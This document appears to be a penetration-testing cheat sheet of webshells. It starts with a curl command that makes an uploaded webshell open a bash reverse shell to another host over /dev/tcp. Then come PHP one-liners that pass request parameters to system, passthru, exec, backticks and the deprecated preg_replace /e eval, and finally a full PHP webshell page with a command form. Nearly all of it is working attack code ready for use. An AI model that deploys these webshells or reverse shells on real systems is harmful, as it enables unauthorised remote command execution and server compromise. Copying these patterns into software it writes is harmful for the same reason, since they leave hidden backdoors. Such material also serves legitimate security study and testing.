# webshells

# upgrading to reverse shell

curl 10.10.10.10/webshell.php --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.10.11/443 0>&1"'

# php

# Execute a command

<?php system("whoami"); ?>

// Same, but using shell_exec()
<?php echo shell_exec("whoami");?>

# PHP webshell taking the command from a request parameter

for example: shell.php?cmd=whoami

<?php system($_GET['cmd']); ?>

// Same but using passthru
<?php passthru($_GET['cmd']); ?>

# exec() does not print the result without echo, and it only returns the last line of output, so on its own it is not very useful.

<?php echo exec("whoami");?>

# Instead do this if you can: the full output is returned in an array, which is then printed.

<?php exec("ls -la",$array); print_r($array); ?>

# preg_replace() with the /e modifier. This is a cool trick, but the /e (eval) modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so it only works on legacy PHP 5 installs.

<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>

# Using backticks

<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>

# Using backticks, echoing the output directly

<?php echo `whoami`; ?>

# simple php webshell

<?php /* shell_exec() hands the POST-supplied string to the system shell; this is the call that hardened php.ini deployments block by listing shell_exec, system, passthru and exec in disable_functions. */ if (!empty($_POST['cmd'])) { $cmd = shell_exec($_POST['cmd']); } ?>
<!DOCTYPE html>
<html lang="en">
<head> <title>Totally not a webshell ;)</title> </head>
<body>
    <main>
        <form method="post">
            <label for="cmd"><strong>Command</strong></label>
            <div class="form-group">
                <input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"
                       onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>
                <button type="submit">GO!</button>
            </div>
        </form>
        <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
            <h2>Output</h2>
            <?php /* $cmd holds the raw shell output; it is escaped for the HTML context only. */ if (isset($cmd)): ?>
                <pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>
            <?php else: ?>
                <pre><small>No result.</small></pre>
            <?php endif; ?>
        <?php endif; ?>
    </main>
</body>
</html>